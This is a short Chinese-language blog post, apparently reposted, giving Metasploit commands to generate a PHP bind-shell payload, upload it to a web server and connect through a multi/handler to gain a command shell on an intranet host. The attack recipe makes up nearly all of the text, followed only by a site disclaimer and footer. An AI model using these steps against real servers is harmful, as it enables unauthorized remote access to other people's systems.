php結合msf反彈內網shell


感謝:

perl6大佬分享的姿勢。

MSF:

msf > use payload/php/bind_php
msf exploit(handler) > set PAYLOAD payload/php/bind_php
msf exploit(handler) > set RHOST 目標內網ip
msf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就會在f盤生成xishaonian.php腳本一般都是需要修改一下,沒有php標簽就加個php標簽之類的。

然后將xishaonian.php傳到web上。
然后再次運行msf

use payload/php/bind_php
msf payload(bind_php) > set RHOST 目標外網ip
msf payload(bind_php) > use exploit/multi/handler
msf exploit(handler) > set payload php/bind_php
msf exploit(handler) > run

訪問web上的xishaonian.php,就可以反彈到cmdshell了。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM